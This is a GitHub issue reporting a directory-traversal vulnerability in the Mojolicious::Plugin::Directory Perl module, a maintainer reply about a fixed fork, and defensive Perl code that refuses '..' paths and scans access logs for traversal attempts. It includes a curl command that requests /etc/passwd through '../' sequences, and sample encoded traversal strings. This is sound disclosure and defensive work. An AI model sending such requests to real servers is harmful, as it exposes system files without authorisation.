hayajo / Mojolicious-Plugin-Directory


This module has directory browsing vulnerability #8

Open hhs66317 opened 3 years ago

hhs66317 commented 3 years ago
```perl
#!/usr/bin/env perl

# simple usage
use Mojolicious::Lite;

plugin Directory => {root => "/home/www/html/soft/" , dir_index => [qw/index.html index.htm/] , auto_index => 1};
plugin AccessLog => {log => '/home/mojo_web/Mojo_web.log' , format => '%h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i" '};

app->start;
```

```shell
curl -v http://172.17.1.13:9090/../../../../../../../../../../../../etc/passwd
```
briandfoy commented 1 year ago

I've forked this module as Mojolicious::Plugin::DirectoryServer (https://github.com/briandfoy/mojolicious-plugin-directoryserver) and added some logic to handle this situation.

For what it's worth, my curl and other interactive browsers already strip the .. from URL (RFC 3986), but I can test it while telnetting directly to the server.
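As an added example (not code from this issue thread, from Mojolicious::Plugin::Directory, or from the DirectoryServer fork), the following shows the containment check a static-file handler needs before serving anything under its configured root, plus a scan of access-log lines in the issue's AccessLog format that surfaces traversal attempts after the fact. The function names `safe_path` and `traversal_hits`, the throw-away docroot and the sample log lines are assumed and constructed for this demonstration.

```perl
#!/usr/bin/env perl
# Added example; not from the issue, the plugin, or the DirectoryServer fork.
# safe_path() and traversal_hits() are assumed names for this demonstration.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);
use File::Path qw(make_path);

# Map a request path onto the filesystem under $root.
# Returns the canonical absolute path, or undef if the request must be refused
# (caller answers 404/403 instead of opening the file).
sub safe_path {
    my ($root, $request_path) = @_;
    my $real_root = realpath($root);
    return undef unless defined $real_root;

    # Decode percent-escapes once so "%2e%2e" is seen as ".." below.
    $request_path =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
    return undef if $request_path =~ /\0/;    # NUL would truncate a C path

    # Walk the segments: drop "" and ".", refuse ".." rather than collapsing it.
    my @parts;
    for my $seg (split m{/+}, $request_path) {
        next if $seg eq '' || $seg eq '.';
        return undef if $seg eq '..';
        push @parts, $seg;
    }

    # realpath follows symlinks, so a link inside the root that points outside
    # it is caught by the prefix test. A non-existent target yields undef.
    my $real = realpath(File::Spec->catfile($real_root, @parts));
    return undef unless defined $real;
    return undef unless $real eq $real_root
                     || index($real, "$real_root/") == 0;
    return $real;
}

# Scan access-log lines (the issue's format '%h %l %u %t "%r" %>s %b ...')
# and return the request strings carrying a literal or encoded "..".
sub traversal_hits {
    my @lines = @_;
    my @hits;
    for my $line (@lines) {
        next unless $line =~ /"([^"]*)"/;    # %r is the first quoted field
        my $request = $1;
        push @hits, $request
            if $request =~ m{(?:\.\.|%2e%2e|%2e\.|\.%2e)(?:/|%2f|\s)}i;
    }
    return @hits;
}

# Demonstration against a throw-away docroot (constructed for this example).
my $root = tempdir(CLEANUP => 1);
make_path("$root/soft");
open my $fh, '>', "$root/soft/index.html" or die "open: $!";
print {$fh} "hello\n";
close $fh;

for my $req ('/soft/index.html', '/soft/../soft/index.html',
             '/../../../../etc/passwd', '/%2e%2e/%2e%2e/etc/passwd') {
    my $p = safe_path($root, $req);
    printf "%-32s => %s\n", $req, defined $p ? "serve $p" : "refuse";
}

# Constructed sample log lines in the AccessLog format from the issue.
my @log = (
    '172.17.1.20 - - [01/Jan/2024:00:00:00 +0000] "GET /soft/index.html HTTP/1.1" 200 6 "-" "curl/8.0"',
    '172.17.1.20 - - [01/Jan/2024:00:00:01 +0000] "GET /../../../../etc/passwd HTTP/1.1" 200 1234 "-" "curl/8.0"',
    '172.17.1.20 - - [01/Jan/2024:00:00:02 +0000] "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1234 "-" "curl/8.0"',
);
print "suspicious: $_\n" for traversal_hits(@log);
```

Only the first request is served; every path containing a `..` segment, encoded or not, is refused before any file is opened, and a symlink under the root that escapes it is caught by comparing `realpath` results rather than the textual path. The log scan is the retrospective counterpart: with the issue's AccessLog format in place, the `%r` field is enough to pick out requests that should have been refused.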